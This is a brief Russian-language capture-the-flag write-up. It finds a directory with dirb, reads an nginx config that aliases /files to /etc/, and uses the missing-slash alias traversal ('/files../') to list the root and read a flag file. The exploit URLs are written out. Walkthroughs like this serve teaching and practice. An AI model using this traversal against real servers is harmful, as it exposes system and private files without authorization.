На главной странице ничего полезного, запускаем dirb. Находим директорию /files
которая выводит листинг /etc
сервера.
Читаем конфиг для nginx.
http://16.owaspctf.gq/files/nginx/conf.d/default.conf
server {
listen 80;
root /usr/share/nginx/html;
index index.html;
server_name _;
autoindex on;
location /files {
alias /etc/;
}
}
http://16.owaspctf.gq/files../
-> листинг /
http://16.owaspctf.gq/files../home/flag.txt
FLAG{NGINX_conf_its_EASY_and_Secure}